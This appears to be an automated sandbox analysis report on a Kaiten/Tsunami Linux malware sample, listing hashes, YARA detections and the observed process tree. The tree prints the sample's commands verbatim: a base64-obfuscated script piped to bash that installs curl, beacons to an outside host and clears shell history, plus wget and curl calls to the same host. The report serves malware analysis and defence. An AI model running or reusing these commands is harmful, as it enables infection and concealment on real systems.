Analysis
-
max time kernel
149s -
max time network
148s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240226-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240226-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
15-04-2024 07:52
General
-
Target
f09c0d5883a221d2e5f762480e946a78_JaffaCakes118
-
Size
42KB
-
MD5
f09c0d5883a221d2e5f762480e946a78
-
SHA1
506386147d393cef81019dda55ac85125914c6be
-
SHA256
0eb2c98d14fce41db0ac9352484438fc40489d6f40c915b659ecc84342aa83a6
-
SHA512
a7c13cbb7855172fcb6fea29da30ff256664fc9515fc25019579d9db1344014804316e43e919e95b6110b77d4023a340639b8cdb63b4a6022437316320793c20
-
SSDEEP
768:oZHhN4I6FWJosiC8bOi6c9rasu7upif9EIgXEB2QeXeoIz8Vj2zc3pTJBXG1wzq:+L4I6zdAi6c94SIgUBVeXO8Azc3pjSw+
Malware Config
Signatures
-
Detects Kaiten/Tsunami Payload 1 IoCs
resource yara_rule behavioral1/memory/1539-1-0x0000000000400000-0x0000000000416f68-memory.dmp family_kaiten2 -
Detects Kaiten/Tsunami payload 1 IoCs
resource yara_rule behavioral1/memory/1539-1-0x0000000000400000-0x0000000000416f68-memory.dmp family_kaiten -
Reads runtime system information 1 IoCs
Reads data from /proc virtual filesystem.
description ioc Process File opened for reading /proc/self/exe f09c0d5883a221d2e5f762480e946a78_JaffaCakes118
Processes
-
/tmp/f09c0d5883a221d2e5f762480e946a78_JaffaCakes118/tmp/f09c0d5883a221d2e5f762480e946a78_JaffaCakes1181⤵
- Reads runtime system information
PID:1539 -
/bin/shsh -c "echo aWYgISB0eXBlIGN1cmwgMj4vZGV2L251bGwgMT4vZGV2L251bGw7IHRoZW4gaWYgdHlwZSBhcHQtZ2V0IDI+L2Rldi9udWxsIDE+L2Rldi9udWxsOyB0aGVuIGFwdC1nZXQgdXBkYXRlIC0tZml4LW1pc3NpbmcgMj4vZGV2L251bGwgMT4vZGV2L251bGwgOyBhcHQtZ2V0IGluc3RhbGwgLXkgY3VybCAyPi9kZXYvbnVsbCAxPi9kZXYvbnVsbCA7IGFwdC1nZXQgaW5zdGFsbCAteSAtLXJlaW5zdGFsbCBjdXJsIDI+L2Rldi9udWxsIDE+L2Rldi9udWxsIDsgZmkKaWYgdHlwZSB5dW0gMj4vZGV2L251bGwgMT4vZGV2L251bGw7IHRoZW4geXVtIGNsZWFuIGFsbCAyPi9kZXYvbnVsbCAxPi9kZXYvbnVsbCA7IHl1bSBpbnN0YWxsIC15IGN1cmwgMj4vZGV2L251bGwgMT4vZGV2L251bGwgOyB5dW0gcmVpbnN0YWxsIC15IGN1cmwgMj4vZGV2L251bGwgMT4vZGV2L251bGwgOyBmaQppZiB0eXBlIGFwayAyPi9kZXYvbnVsbCAxPi9kZXYvbnVsbDsgdGhlbiBhcGsgdXBkYXRlIDI+L2Rldi9udWxsIDE+L2Rldi9udWxsIDsgYXBrIGFkZCBjdXJsIDI+L2Rldi9udWxsIDE+L2Rldi9udWxsIDsgZmkgOyBmaSA7IGN1cmwgLXNMayBodHRwOi8vY2hpbWFlcmEuY2MvbG9nL2luZi5waHAgLW8gL2Rldi9udWxsIDsgaGlzdG9yeSAtYyA7IGNsZWFyCgo= | base64 -d | bash"2⤵PID:1540
-
/bin/bashbash3⤵PID:1543
-
/usr/bin/curlcurl -sLk http://chimaera.cc/log/inf.php -o /dev/null4⤵PID:1544
-
-
/usr/bin/clearclear4⤵PID:1553
-
-
-
/usr/bin/base64base64 -d3⤵PID:1542
-
-
-
/bin/shsh -c "wget -q -O /dev/null http://chimaera.cc/log/inf.php || curl -s -o /dev/null http://chimaera.cc/log/inf.php"2⤵PID:1554
-
/usr/bin/wgetwget -q -O /dev/null http://chimaera.cc/log/inf.php3⤵PID:1555
-
-
/usr/bin/curlcurl -s -o /dev/null http://chimaera.cc/log/inf.php3⤵PID:1559
-
-